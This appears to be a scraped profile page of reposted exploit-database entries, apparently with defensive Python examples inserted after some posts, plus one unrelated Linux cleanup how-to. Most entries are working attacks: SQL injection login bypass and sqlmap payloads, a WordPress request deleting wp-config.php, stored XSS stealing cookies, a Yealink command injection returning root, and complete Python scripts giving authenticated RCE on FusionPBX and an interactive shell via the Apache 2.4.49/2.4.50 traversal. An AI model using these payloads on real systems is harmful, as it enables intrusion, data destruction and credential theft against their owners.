
Everything posted by HireHackking
-
Money Transfer Management System 1.0 - Authentication Bypass
# Exploit Title: Money Transfer Management System 1.0 - Authentication Bypass
# Date: 2021-11-07
# Exploit Author: Aryan Chehreghani
# Vendor Homepage: https://www.sourcecodester.com
# Software Link: https://www.sourcecodester.com/php/15015/money-transfer-management-system-send-money-businesses-php-free-source-code.html
# Version: 1.0
# Tested on: Windows 10

# Admin panel authentication bypass

Admin panel authentication can be bypassed due to a SQL injection in the login form:

Request:

Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:52.0) Gecko/20100101 Firefox/52.0 Cyberfox/52.9.1
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Referer: http://localhost/mtms/admin/login.php
Content-Length: 37
Cookie: PHPSESSID=8jff4m81f5j0ej125k1j9rdrc3
Connection: keep-alive

username='=''or'&password='=''or'

PoC:

curl -d "username='=''or'&password='=''or'" -X POST http://localhost/mtms/admin/login.php
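Why the '=''or' value works, and what the fix looks like, as an added example (not code from the advisory or from the MTMS application). It assumes the login builds its query by string concatenation against a users table with username and password columns; the table here is constructed in memory with sqlite3 so the parameterised version can actually run.

```python
import sqlite3

# Constructed stand-in for the application's users table (assumption:
# the login compares username and password as strings, as the PoC request suggests).
def make_db():
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE users (username TEXT, password TEXT)")
    con.execute("INSERT INTO users VALUES ('admin', 'S3cret!')")
    return con

BYPASS = "'=''or'"  # the value the PoC sends for both username and password


def vulnerable_query(username, password):
    """String concatenation: returns the SQL text the server would hand to MySQL."""
    return ("SELECT * FROM users WHERE username='%s' AND password='%s'"
            % (username, password))


def safe_lookup(con, username, password):
    """Parameterised form: the input is bound as data and can never become SQL syntax."""
    cur = con.execute(
        "SELECT username FROM users WHERE username=? AND password=?",
        (username, password))
    return cur.fetchone()


def demo():
    con = make_db()
    sql = vulnerable_query(BYPASS, BYPASS)
    # The WHERE clause becomes   username=''=''or'' AND password=''=''or''
    # which MySQL parses as ((username='')='') OR ('' AND ((password='')='')) OR ''.
    # For every row username='' is 0, and MySQL compares 0 with '' numerically
    # (''  -> 0), so (0='')=1 and the OR makes the whole clause true: every
    # user row matches and the first one (the admin) is logged in.
    # (Reasoning about MySQL's loose comparison; sqlite3 does not coerce the
    # same way, so only the string and the parameterised query are exercised here.)
    assert sql == ("SELECT * FROM users WHERE username=''=''or'' "
                   "AND password=''=''or''")
    # Bound parameters look for a user literally named '=''or' and find nothing.
    assert safe_lookup(con, BYPASS, BYPASS) is None
    assert safe_lookup(con, "admin", "S3cret!") == ("admin",)
    return sql


if __name__ == "__main__":
    print(demo())
```

The string returned by vulnerable_query is what to look for in the application's login handler; replacing the concatenation with a prepared statement (mysqli/PDO with bound parameters in PHP) is the fix, and checking a password hash rather than a plaintext column is the second one.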
-
Kmaleon 1.1.0.205 - 'tipocomb' SQL Injection (Authenticated)
# Exploit Title: Kmaleon 1.1.0.205 - 'tipocomb' SQL Injection (Authenticated)
# Google Dork: intitle:"Inicio de Sesión - Kmaleon"
# Date: 2021-11-05
# Exploit Author: Amel BOUZIANE-LEBLOND
# Vendor Homepage: https://www.levelprograms.com
# Software Link: https://www.levelprograms.com/kmaleon-abogados/
# Version: v1.1.0.205
# Tested on: Linux

# Description:
# The Kmaleon application from levelprograms is vulnerable to
# SQL injection via the 'tipocomb' parameter of kmaleonW.php

====================
1. SQLi
====================

http://127.0.0.1/kmaleonW.php?c=age&a=doc&usuario=1&fechain=2021-11-05&fechafin=2021-11-05&tipocomb=[SQLI]&isgroup=true

The 'tipocomb' parameter is vulnerable to SQL injection (sqlmap output):

GET parameter 'tipocomb' is vulnerable.
---
Parameter: #1* (URI)
    Type: boolean-based blind
    Title: OR boolean-based blind - WHERE or HAVING clause
    Payload: http://localhost/kmaleonW.php?c=age&a=doc&usuario=1&fechain=2021-11-05&fechafin=2021-11-05&tipocomb=-9144 OR 6836=6836&isgroup=true

    Type: error-based
    Title: MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: http://localhost/kmaleonW.php?c=age&a=doc&usuario=1&fechain=2021-11-05&fechafin=2021-11-05&tipocomb= OR (SELECT 8426 FROM(SELECT COUNT(*),CONCAT(0x7176716b71,(SELECT (ELT(8426=8426,1))),0x716a707671,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)&isgroup=true

    Type: time-based blind
    Title: MySQL >= 5.0.12 OR time-based blind (query SLEEP)
    Payload: http://localhost/kmaleonW.php?c=age&a=doc&usuario=1&fechain=2021-11-05&fechafin=2021-11-05&tipocomb= OR (SELECT 2738 FROM (SELECT(SLEEP(5)))EYSv)&isgroup=true
---
[INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL >= 5.0.0
-
WordPress Plugin Backup and Restore 1.0.3 - Arbitrary File Deletion
# Exploit Title: WordPress Plugin Backup and Restore 1.0.3 - Arbitrary File Deletion
# Date: 11/07/2021
# Exploit Author: Murat DEMIRCI (@butterflyhunt3r)
# Vendor Homepage: https://www.miniorange.com/
# Software Link: https://wordpress.org/plugins/backup-and-restore-for-wp/
# Version: 1.0.3
# Tested on : Windows 10

#Poc:

----------------------------------REQUEST---------------------------------------
POST /wordpress/wp-admin/admin-ajax.php HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://localhost/wordpress/wp-admin/admin.php?page=mo_eb_backup_report
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 155
Origin: http://localhost
Connection: close
Cookie: wordpress_bbfa5b726c6b7a9cf3cda9370be3ee91=admin%7C1636463166%7C9VH5dtz6rmSefsnxLUWgFNF85FReGRWg61Nhbu95sJZ%7E82178aa467cd00f9cbcce03c6157fdcbf581a715d3cdc7a6b5c940dafe58fifd; wordpress_test_cookie=WP%20Cookie%20check; wordpress_logged_in_bbfa5b726c6b7a9cf3cda9371ce3ee91=admin%7C1836463166%7C9VH5dtz6rmSefsnxLUZgFNF85FReGRWg61Vhau95sJZ%7C9ae26395803f7d17f75c62d98856f3249e72688d38a9d3dbb616a0e3c808c917; wp-settings-1=libraryContent%3Dbrowse%26mfold%3Do%26posts_list_mode%3Dlist; wp-settings-time-1=1636290368
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin

action=barfw_backup_ajax_redirect&call_type=delete_backup&file_name=wp-config.php&folder_name=C%3a%5cxampp%5chtdocs%5cwordpress%5c%5c&id=5&nonce=ee90968cce
----------------------------------------------------------------------------------

-------------------------------RESPONSE-------------------------------------------
HTTP/1.1 200 OK
Date: Sun, 07 Nov 2021 13:19:38 GMT
Server: Apache/2.4.48 (Win64) OpenSSL/1.1.1k PHP/8.0.7
X-Powered-By: PHP/8.0.7
Access-Control-Allow-Origin: http://localhost
Access-Control-Allow-Credentials: true
X-Robots-Tag: noindex
X-Content-Type-Options: nosniff
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
X-Frame-Options: SAMEORIGIN
Referrer-Policy: strict-origin-when-cross-origin
Content-Length: 9
Connection: close
Content-Type: application/json; charset=UTF-8

"success"
----------------------------------------------------------------------------------
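The request above lets the caller pick both folder_name and file_name, so the delete lands wherever the attacker points it (here wp-config.php, with an admin session cookie and a nonce in hand). The hardened shape of such a delete handler, as an added example rather than the plugin's own code: the backup directory is fixed server-side, the file name is required to be a bare name, and the resolved target is checked to still be inside that directory before unlink. The directory layout is constructed in a temp dir so it runs offline.

```python
from pathlib import Path
import tempfile


def vulnerable_delete(folder_name, file_name):
    """The flawed pattern: caller-controlled folder and file names are joined and
    deleted with no check on where the result points."""
    (Path(folder_name) / file_name).unlink()


def safe_delete(backup_dir, file_name):
    """Hardened form: only a plain file name inside the server-chosen backup
    directory may be deleted. Returns the deleted path."""
    base = Path(backup_dir).resolve()
    # A bare name only: no separators of either flavour, no '.'/'..'.
    if (file_name in ("", ".", "..") or "\\" in file_name
            or Path(file_name).name != file_name):
        raise ValueError("file name must not contain path components")
    target = (base / file_name).resolve()
    # resolve() follows symlinks, so a planted link to wp-config.php is caught here too.
    if target.parent != base:
        raise ValueError("refusing to delete outside the backup directory")
    if not target.is_file():
        raise FileNotFoundError(file_name)
    target.unlink()
    return target


def demo():
    """Constructed layout: <tmp>/backups/site.zip and <tmp>/wp-config.php."""
    root = Path(tempfile.mkdtemp())
    backups = root / "backups"
    backups.mkdir()
    (backups / "site.zip").write_bytes(b"PK\x03\x04")
    config = root / "wp-config.php"
    config.write_text("<?php // constructed sample\n")

    results = {}
    for name in ("../wp-config.php", "/etc/passwd", "wp-config.php", "site.zip"):
        try:
            safe_delete(backups, name)
            results[name] = "deleted"
        except (ValueError, FileNotFoundError) as exc:
            results[name] = type(exc).__name__
    results["config_survives"] = config.exists()
    return results


if __name__ == "__main__":
    print(demo())
```

The folder_name parameter disappears entirely in the safe version; a client should never be able to name the directory a privileged handler deletes from. The is_file() check also means the handler cannot be pointed at a directory or a device node.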
-
zlog 1.2.15 - Buffer Overflow
# Exploit Title: zlog 1.2.15 - Buffer Overflow
# Date: 10/23/2021
# Exploit Author: LIWEI
# Vendor Homepage: https://github.com/HardySimpson/zlog
# Software Link: https://github.com/HardySimpson/zlog
# Version: v1.2.15
# Tested on: ubuntu 18.04.2

# 1.- Compile the zlog v1.2.15 code as a library.
# 2.- Use the "zlog_init" API to parse a file, as in the test case below.
# 3.- Crash: the config parser performs a stack-buffer-overflow READ.
# 4.- You can also get a stack-buffer-overflow WRITE when the address of the pointer that overflow-reads ends with "0x20".
# 5.- Crash backtrace:

#0 0x5588c3 in zlog_conf_build_with_file /src/zlog/src/conf.c:308:15
#1 0x557ad6 in zlog_conf_new /src/zlog/src/conf.c:176:7
#2 0x551183 in zlog_init_inner /src/zlog/src/zlog.c:91:18
#3 0x551008 in zlog_init /src/zlog/src/zlog.c:134:6
#4 0x550df1 in LLVMFuzzerTestOneInput /src/zlog_init_fuzzer.c:18:18

Test case (libFuzzer harness):

#include <stdio.h>
#include <stdlib.h>
#include <stdint.h>
#include <unistd.h>   /* getpid, unlink */
#include "zlog.h"

int LLVMFuzzerTestOneInput(const uint8_t *data, size_t size)
{
    char filename[256];

    /* write the fuzzer input to a per-process temp file and feed it to zlog as a config file */
    sprintf(filename, "/tmp/libfuzzer.%d", getpid());
    FILE *fp = fopen(filename, "wb");
    if (!fp)
        return 0;
    fwrite(data, size, 1, fp);
    fclose(fp);

    int rc = zlog_init(filename);   /* crashes inside zlog_conf_build_with_file */
    if (rc == 0) {
        zlog_fini();
    }
    unlink(filename);
    remove(filename);
    return 0;
}

Put the test case in the project and change the compile line to

CC="clang" CFLAGS="-O1 -fno-omit-frame-pointer -gline-tables-only -DFUZZING_BUILD_MODE_UNSAFE_FOR_PRODUCTION -fsanitize=address -fsanitize-address-use-after-scope -fsanitize=fuzzer-no-link" CXX="clang++" CXXFLAGS="-O1 -fno-omit-frame-pointer -gline-tables-only -DFUZZING_BUILD_MODE_UNSAFE_FOR_PRODUCTION -fsanitize=address -fsanitize-address-use-after-scope -fsanitize=fuzzer-no-link -stdlib=libc++"

Use ./configure under the project as shown in its README.txt. You will get a binary named after the test case; run it and you will reproduce the crash.
-
Title: Kali Linux garbage cleaning tool
Stacer is a graphical garbage-cleaning and system-management tool. It offers process management, start-up item management, and visual software installation and uninstallation, which makes it friendly for newcomers who are not yet comfortable with Linux commands.

Installation

apt-get install stacer

Features:
- Colorful dashboard
- Visible garbage scanning
- Process management
- Start-up management
- Visual software uninstall
- System source (repository) management

Using commands to clean up garbage

Uninstall software

apt-get remove package-name
apt-get purge package-name

remove deletes the package but keeps its configuration files; purge deletes both the package and its configuration files.

Find out which packages have left residual configuration files on the system:

dpkg --list | grep '^rc'

The rc in the first column means the package has been removed (r) but its configuration files (c) are still present. Extract the names of these packages:

dpkg --list | grep '^rc' | cut -d ' ' -f 3

Purge them:

dpkg --list | grep '^rc' | cut -d ' ' -f 3 | xargs sudo dpkg --purge

To delete only the configuration files of a single package:

sudo dpkg --purge package-name

Delete cached .deb installation packages

sudo apt-get clean
sudo apt-get autoclean

Delete orphan packages

When you install a package with apt-get, its dependencies are installed automatically. When you later remove that package, those dependencies are no longer needed; such leftover dependencies are called orphan packages and can be removed with:

apt-get autoremove

Clean log files

Log files keep growing. The ncdu tool makes it easy to find the large ones:

apt-get install ncdu
sudo ncdu /var/log
-
Employee Daily Task Management System 1.0 - 'Name' Stored Cross-Site Scripting (XSS)
# Exploit Title: Employee Daily Task Management System 1.0 - 'Name' Stored Cross-Site Scripting (XSS)
# Date: 09/11/2021
# Exploit Author: Ragavender A G
# Vendor Homepage: https://www.sourcecodester.com/
# Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/edtms.zip
# Version: v1.0
# Tested on: Windows 10

Exploit:

1. Navigate to the URL http://localhost/edtms/edtms/admin/?page=maintenance
2. Add a new department with the following value:
   - Name: <svg/onload=alert(1)>
3. Save the department and refresh the page, which triggers the payload.

PoC:

POST /edtms/edtms/Actions.php?a=save_department HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 49
Origin: http://localhost
Connection: close
Referer: http://localhost/edtms/edtms/admin/?page=maintenance
Cookie: PHPSESSID=bmh8mhmk3r0rksta56msbl7dn3

id=&name=%3Csvg%2Fonload%3Dalert(100)%3E&status=1
-
FusionPBX 4.5.29 - Remote Code Execution (RCE) (Authenticated)
# Exploit Title: FusionPBX 4.5.29 - Remote Code Execution (RCE) (Authenticated)
# Date: 11/08/2021
# Exploit Author: Luska
# Vendor Homepage: https://www.fusionpbx.com/
# Software Link: https://github.com/fusionpbx/fusionpbx
# Version: < 4.5.30
# Tested on: Debian
# CVE : CVE-2021-43405

#!/usr/bin/python3

import requests
from requests_toolbelt.multipart.encoder import MultipartEncoder
import argparse

cookies = {'PHPSESSID': '31337'}
# requests are routed through a local intercepting proxy (e.g. Burp); drop this if none is running
proxy = {'http': 'http://127.0.0.1:8080'}


def login(url, username, password):
    data = {
        'username': username,
        'password': password
    }
    r = requests.post(url + '/core/user_settings/user_dashboard.php', data=data, cookies=cookies)
    return r.status_code


def exploit_request(url, cmd):
    print('[+] Sending Exploit Request')
    # fax_extension ends up in a shell command: ';' terminates the intended
    # command and '#' comments out whatever follows the injected one
    mp_encoder = MultipartEncoder(fields={
        'fax_subject': '1337',
        'fax_extension': f';{cmd} #',
        'action': 'send',
        'submit': 'send'
    })
    r = requests.post(url + '/app/fax/fax_send.php', cookies=cookies,
                      headers={'Content-Type': mp_encoder.content_type},
                      data=mp_encoder, proxies=proxy)
    return r.status_code


def exploit(url, username, password, cmd):
    if login(url, username, password) == 200:
        print('[+] Login Successful')
        exploit_request(url, cmd)
        print('[+] Exploit Successful')
    else:
        print('[-] Login Failed')


if __name__ == '__main__':
    parser = argparse.ArgumentParser(description='[*] FusionPBX < 4.5.30 Remote Code Execution | CVE-2021-43405')
    parser.add_argument('-t', metavar='<target/host URL>', help='Target/host URL, example: http://127.0.0.1', required=True)
    parser.add_argument('-u', metavar='<user>', help='User to login', required=True)
    parser.add_argument('-p', metavar='<password>', help='User\'s password', required=True)
    parser.add_argument('-c', metavar='<cmd>', help='Command to be executed', required=True)
    args = parser.parse_args()

    target = args.t
    user = args.u
    password = args.p
    cmd = args.c

    exploit(target, user, password, cmd)
-
Employee and Visitor Gate Pass Logging System 1.0 - 'name' Stored Cross-Site Scripting (XSS)
# Exploit Title: Employee and Visitor Gate Pass Logging System 1.0 - 'name' Stored Cross-Site Scripting (XSS)
# Date: 10.11.2021
# Exploit Author: İlhami Selamet
# Vendor Homepage: https://www.sourcecodester.com/php/15026/employee-and-visitor-gate-pass-logging-system-php-source-code.html
# Software Link: https://www.sourcecodester.com/download-code?nid=15026&title=Employee+and+Visitor+Gate+Pass+Logging+System+in+PHP+with+Source+Code
# Version: v1.0
# Tested on: Kali Linux + XAMPP v8.0.12

Employee and Visitor Gate Pass Logging System PHP 1.0 suffers from a stored Cross Site Scripting (XSS) vulnerability.

Step 1 - Log in with the admin account and navigate to the 'Department List' tab:
         http://localhost/employee_gatepass/admin/?page=maintenance/department
Step 2 - Click the 'Create New' button to add a new department.
Step 3 - Fill out all required fields. Put the payload in the department 'name' field:
         <script>alert(document.cookie)</script>
Step 4 - Save the department. The stored XSS triggers for every user who opens the 'Department List' page.

PoC

POST /employee_gatepass/classes/Master.php?f=save_department HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Content-Type: multipart/form-data; boundary=---------------------------407760789114464123714007564888
Content-Length: 555
Origin: http://localhost
Connection: close
Referer: http://localhost/employee_gatepass/admin/?page=maintenance/department
Cookie: PHPSESSID=8d0l6t3pq47irgnbipjjesrv54

-----------------------------407760789114464123714007564888
Content-Disposition: form-data; name="id"


-----------------------------407760789114464123714007564888
Content-Disposition: form-data; name="name"

<script>alert(document.cookie);</script>
-----------------------------407760789114464123714007564888
Content-Disposition: form-data; name="description"

desc
-----------------------------407760789114464123714007564888
Content-Disposition: form-data; name="status"

1
-----------------------------407760789114464123714007564888--
-
AbsoluteTelnet 11.24 - 'Username' Denial of Service (PoC)
# Exploit Title: AbsoluteTelnet 11.24 - 'Username' Denial of Service (PoC)
# Discovered by: Yehia Elghaly
# Discovered Date: 2021-11-10
# Vendor Homepage: https://www.celestialsoftware.net/
# Software Link: https://www.celestialsoftware.net/telnet/AbsoluteTelnet32.11.24.exe
# Tested Version: 11.24
# Vulnerability Type: Denial of Service (DoS) Local
# Tested on OS: Windows 7 Professional x86 SP1 - Windows 10 x64

# Description: AbsoluteTelnet 11.24 - 'SHA1/SHA2/Username' and 'Error Report' Denial of Service (PoC)

# Steps to reproduce:
# 1. - Download and install AbsoluteTelnet
# 2. - Run the python script; it creates the exploit.txt file.
# 3. - Open AbsoluteTelnet 11.24
# 4. - "New connection file -> Connection -> SSH1 & SSH2"
# 5. - Paste the characters from the txt file into "Authentication -> Username"
# 6. - Press the "OK" button
# 7. - Crashed
# 8. - Reopen AbsoluteTelnet 11.24
# 9. - Copy the same characters into "Your Email Address (optional)"
# 10.- Click the "Send Error Report" button
# 11.- Crashed

#!/usr/bin/python

# writes a 1000-byte string of 'A' to exploit.txt for pasting into the dialog
exploit = 'A' * 1000

try:
    file = open("exploit.txt", "w")
    file.write(exploit)
    file.close()
    print("POC is created")
except:
    print("POC not created")
-
YeaLink SIP-TXXXP 53.84.0.15 - 'cmd' Command Injection (Authenticated)
# Exploit Title: YeaLink SIP-TXXXP 53.84.0.15 - 'cmd' Command Injection (Authenticated)
# Date: 11-10-2021
# Exploit Author: tahaafarooq
# Vendor Homepage: https://www.yealink.com/
# Version: 53.84.0.15
# Tested on: YeaLink IP Phone SIP-T19P (Hardware VoIP Phone)

Description:

The Diagnostic tool in the Network tab runs a Ping or Traceroute against a user-supplied value; the value is passed to the OS unsanitised, which allows OS command injection as the root user.

POC:

POST /servlet?m=mod_data&p=network-diagnosis&q=docmd&Rajax=0.890925468511929 HTTP/1.1
Host: xxx.xxx.xxx.xxx
Content-Length: 49
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept: */*
Origin: http://xxx.xxx.xxx.xxx
Referer: http://xxx.xxx.xxx.xxx/servlet?m=mod_data&p=network-diagnosis&q=load
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: JSESSIONID=9a83d24461329a130
Connection: close

cmd=; id;&token=1714636915c6acea98

-------------------------------------------------

HTTP/1.1 200 OK
Content-Type: text/html
Connection: close
Date: Wed, 10 Nov 2021 14:20:23 GMT
Server: embed httpd
Content-Length: 82

<html>
<body>
<div id="_RES_INFO_">
uid=0(root) gid=0(root)
</div>
</body>
</html>
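Both the FusionPBX fax_extension injection above (';cmd #') and this Yealink diagnostics injection ('; id;') come from the same defect: a user value pasted into a shell command string. The following is an added example of the vulnerable pattern next to its hardened form, not code from either vendor; the ping wrapper, the hostname regex and the sample payloads are all assumptions chosen to mirror the two PoCs.

```python
import re
import shlex
import subprocess

# Assumed allow-list for a diagnostics target: a hostname, IPv4 or IPv6 literal.
# Must start with an alphanumeric so a value can never be parsed as an option.
HOST_RE = re.compile(r"^[A-Za-z0-9][A-Za-z0-9.\-:]{0,252}$")


def vulnerable_command(target):
    """The flawed pattern: the value becomes part of a shell string, so ';'
    ends the ping and whatever follows runs as the web server's user."""
    return f"ping -c 1 {target}"


def safe_ping_argv(target):
    """Hardened form: validate against an allow-list, then build an argv list so
    no shell ever parses the value. Raises ValueError on anything suspicious."""
    if not HOST_RE.fullmatch(target):
        raise ValueError(f"rejected diagnostics target: {target!r}")
    return ["ping", "-c", "1", target]


def run_ping(target, timeout=10):
    """Execute without shell=True; the list form is what makes injection impossible."""
    return subprocess.run(safe_ping_argv(target), capture_output=True,
                          text=True, timeout=timeout)


def quoted_for_shell(value):
    """If a shell string is truly unavoidable, shlex.quote turns the whole value
    into one single-quoted word, so metacharacters lose their meaning."""
    return f"ping -c 1 {shlex.quote(value)}"


def demo():
    yealink = "; id;"     # payload from the diagnostics PoC (constructed copy)
    fusionpbx = ";id #"   # shape of the FusionPBX fax_extension payload
    out = {
        "vulnerable_yealink": vulnerable_command(yealink),   # ping -c 1 ; id;
        "quoted_yealink": quoted_for_shell(yealink),          # ping -c 1 '; id;'
    }
    for label, payload in (("yealink", yealink), ("fusionpbx", fusionpbx)):
        try:
            safe_ping_argv(payload)
            out[label] = "accepted"
        except ValueError:
            out[label] = "rejected"
    out["ok"] = safe_ping_argv("127.0.0.1")
    return out


if __name__ == "__main__":
    print(demo())
```

Prefer the argv form over quoting: shlex.quote only protects the shell layer, whereas a validated argument list removes the shell altogether and also keeps values such as "-f" from being read as flags by the program itself.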
-
Apache HTTP Server 2.4.50 - Remote Code Execution (RCE) (3)
# Exploit Title: Apache HTTP Server 2.4.50 - Remote Code Execution (RCE) (3)
# Date: 11/11/2021
# Exploit Author: Valentin Lobstein
# Vendor Homepage: https://apache.org/
# Version: Apache 2.4.49/2.4.50 (CGI enabled)
# Tested on: Debian GNU/Linux
# CVE : CVE-2021-41773 / CVE-2021-42013
# Credits : Lucas Schnell

#!/usr/bin/env python3
#coding: utf-8

import os
import sys
import time
import requests
from colorama import Fore, Style

# The original block-letter "APACHE RCE" banner did not survive extraction; a plain one is used here.
header = '\033[1;91m' + '''
  APACHE RCE  (CVE-2021-41773 / CVE-2021-42013)
''' + Style.RESET_ALL

if len(sys.argv) < 2:
    print('Use: python3 file.py ip:port ')
    sys.exit()


def end():
    print("\t\033[1;91m[!] Bye bye !")
    time.sleep(0.5)
    sys.exit(1)


def send_raw(session, url, command):
    """POST the command as the request body to /bin/bash reached through the traversal.
    The prepared request's URL is overwritten with the raw string so that requests
    does not normalise the encoded '..' sequences away."""
    req = requests.Request('POST', url=url, data=command)
    prepare = req.prepare()
    prepare.url = url
    response = session.send(prepare, timeout=5)
    return response.text


def commands(url, command, session):
    directory = mute_command(url, 'pwd')
    user = mute_command(url, 'whoami')
    hostname = mute_command(url, 'hostname')
    print(Fore.YELLOW + 'Reverse shell is advised (This isn\'t an interactive shell)')
    command = input(f"{Fore.RED}╭─{Fore.GREEN + user}@{hostname}: {Fore.BLUE + directory}\n{Fore.RED}╰─{Fore.YELLOW}$ {Style.RESET_ALL}")
    command = f"echo; {command};"
    output = send_raw(session, url, command)
    print(output)
    if 'clear' in command:
        os.system('/usr/bin/clear')
        print(header)
    if 'exit' in command:
        end()


def mute_command(url, command):
    session = requests.Session()
    return send_raw(session, url, f"echo; {command}").strip()


def exploitRCE(payload):
    try:
        host = sys.argv[1]
        if 'http' not in host:
            url = 'http://' + host + payload
        else:
            url = host + payload
        session = requests.Session()
        command = "echo; id"
        output = send_raw(session, url, command)
        if "uid" in output:
            print(Fore.GREEN + '\n[!] Target %s is vulnerable !!!' % host)
            print("[!] Output:\n\n" + Fore.YELLOW + output)
            choice = input(Fore.CYAN + "[?] Do you want to exploit this RCE ? (Y/n) : ")
            if choice.lower() in ['', 'y', 'yes']:
                while True:
                    commands(url, command, session)
            else:
                end()
        else:
            print(Fore.RED + '\nTarget %s isn\'t vulnerable' % host)
    except KeyboardInterrupt:
        end()


def main():
    try:
        # 2.4.49: single-encoded dot ('.%2e' = '..') slips past the path normalisation
        apache2449_payload = '/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/bin/bash'
        # 2.4.50: the fix rejects '%2e', so the dot is double-encoded ('%%32%65' -> '%2e' -> '.')
        apache2450_payload = '/cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/bin/bash'
        payloads = [apache2449_payload, apache2450_payload]
        choice = len(payloads) + 1
        print(header)
        print("\033[1;37m[0] Apache 2.4.49 RCE\n[1] Apache 2.4.50 RCE")
        while choice >= len(payloads) and choice >= 0:
            choice = int(input('[~] Choice : '))
            if choice < len(payloads):
                exploitRCE(payloads[choice])
    except KeyboardInterrupt:
        print("\n\033[1;91m[!] Bye bye !")
        time.sleep(0.5)
        sys.exit(1)


if __name__ == '__main__':
    main()
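The difference between the two payloads is how many percent-decoding passes it takes before '..' appears, which is why the 2.4.50 fix for CVE-2021-41773 was incomplete and became CVE-2021-42013. The following added example (not part of the exploit above) decodes each payload once and twice with the standard library and reports at which pass the path climbs above the document root; the traversal check is a hand-rolled depth counter because posixpath.normpath silently swallows leading '..' components.

```python
from urllib.parse import unquote

APACHE_2449 = "/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/bin/bash"
APACHE_2450 = "/cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/bin/bash"


def decode_passes(path):
    """Return (after_one_pass, after_two_passes). unquote leaves invalid escapes
    such as '%%' untouched, so '%%32%65' becomes '%2e' first and '..' second."""
    once = unquote(path)
    twice = unquote(once)
    return once, twice


def escapes_root(path):
    """True if walking the segments ever climbs above '/'. Unlike normpath, a
    '..' at depth 0 is reported rather than dropped."""
    depth = 0
    for seg in path.split("/"):
        if seg == "..":
            depth -= 1
            if depth < 0:
                return True
        elif seg and seg != ".":
            depth += 1
    return False


def classify(path):
    """Which decoding pass first exposes a traversal: 'first pass', 'second pass' or 'none'.
    A check that normalises only once (the 2.4.50 fix) sees 'second pass' paths as harmless."""
    once, twice = decode_passes(path)
    if escapes_root(once):
        return "first pass"
    if escapes_root(twice):
        return "second pass"
    return "none"


def report():
    """Constructed table: the two advisory payloads plus a benign CGI path."""
    return {p: (decode_passes(p)[1], classify(p))
            for p in (APACHE_2449, APACHE_2450, "/cgi-bin/printenv")}


if __name__ == "__main__":
    for path, (decoded, verdict) in report().items():
        print(f"{verdict:12} {path}\n             -> {decoded}")
```

The practical detection rule follows from classify(): decode until the string stops changing (or cap the passes and reject anything still containing '%' escapes), and only then look for '..' segments. Requests whose raw target contains '%2e' or '%%32%65' in a '/cgi-bin/' prefix are also a cheap access-log indicator for this exploit family.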
-
AbsoluteTelnet 11.24 - 'Phone' Denial of Service (PoC)
# Exploit Title: AbsoluteTelnet 11.24 - 'Phone' Denial of Service (PoC)
# Discovered by: Yehia Elghaly
# Discovered Date: 2021-11-10
# Vendor Homepage: https://www.celestialsoftware.net/
# Software Link : https://www.celestialsoftware.net/telnet/AbsoluteTelnet32.11.24.exe
# Tested Version: 11.24
# Vulnerability Type: Denial of Service (DoS) Local
# Tested on OS: Windows 7 Professional x86 SP1 - Windows 10 x64

# Description: AbsoluteTelnet 11.24 - 'DialUp/Phone' & license name Denial of Service (PoC)

# Steps to reproduce:
# 1. - Download and install AbsoluteTelnet
# 2. - Run the python script; it creates the exploit.txt file.
# 3. - Open AbsoluteTelnet 11.24
# 4. - "New connection file -> DialUp Connection"
# 5. - Paste the characters from the txt file into "DialUp -> phone"
# 6. - Press the "OK" button
# 7. - Crashed
# 8. - Reopen AbsoluteTelnet 11.24
# 9. - Copy the same characters into "license name"
# 10.- Click the "Send Error Report" button
# 11.- Crashed

#!/usr/bin/python

# writes a 1000-byte string of 'A' to exploit.txt for pasting into the dialog
exploit = 'A' * 1000

try:
    file = open("exploit.txt", "w")
    file.write(exploit)
    file.close()
    print("POC is created")
except:
    print("POC not created")
-
FormaLMS 2.4.4 - Authentication Bypass
# Exploit Title: FormaLMS 2.4.4 - Authentication Bypass
# Google Dork: inurl:index.php?r=adm/
# Date: 2021-11-10
# Exploit Author: Cristian 'void' Giustini @ Hacktive Security
# Vendor Homepage: https://formalms.org
# Software Link: https://formalms.org
# Version: <= 2.4.4
# Tested on: Linux
# CVE : CVE-2021-43136
# Info: An authentication bypass issue in FormaLMS <= 2.4.4 allows an attacker to bypass the authentication mechanism and obtain valid access to the platform.
